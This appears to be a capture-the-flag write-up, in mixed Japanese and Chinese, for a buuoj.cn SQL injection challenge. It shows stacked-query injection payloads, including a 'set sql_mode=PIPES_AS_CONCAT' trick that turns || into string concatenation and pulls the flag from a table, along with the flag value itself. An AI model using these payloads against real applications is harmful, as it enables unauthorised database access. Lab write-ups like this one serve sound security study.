件名アドレス:https://buuoj.cn/challenges
問題解決のアイデア
最初のステップ:タイトル、入力フィールドを入力します。タイトルから、SQLインジェクション攻撃であることがわかります。
ステップ2:SQLステートメントをテストする
-
入力
1' or '1'='1
テストに抜け穴があり、ブロックされていることが判明したかどうか
-
スタックインジェクションの脆弱性があるかどうかを確認します。入力により、
1;show tables;#
スタックの脆弱性があることがわかりました。
-
スタックインジェクションを使用してフラグを表示してみてください。フラグがブロックされていることがわかりました。
-
情報を読んでヒントを
select $post['query']||flag from Flag
得る:||論理的でない、または
|| 具体语法规则为:
当两个操作数都为非 NULL 值时,如果有任意一个操作数为非零值,则返回值为 1,否则结果为 0;
当有一个操作数为NULL 时,如果另一个操作数为非零值,则返回值为 1,否则结果为NULL;
假如两个操作数均为 NULL 时,则返回值为 NULL。
- テストステートメント
1;set sql_mode=PIPES_AS_CONCAT;select 1
は、プログラムの実行効果を次のようにします。
select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag
フラグを取得します:flag {27e56243-45c5-4c26-9c74-7b31521e9c13}
その中でPIPES_AS_CONCAT 将 || 视为字符串的连接操作符而非 "或" 运算符
予期しない解決策について
シールド*がないため、入力*,1
にフラグを立てることもできます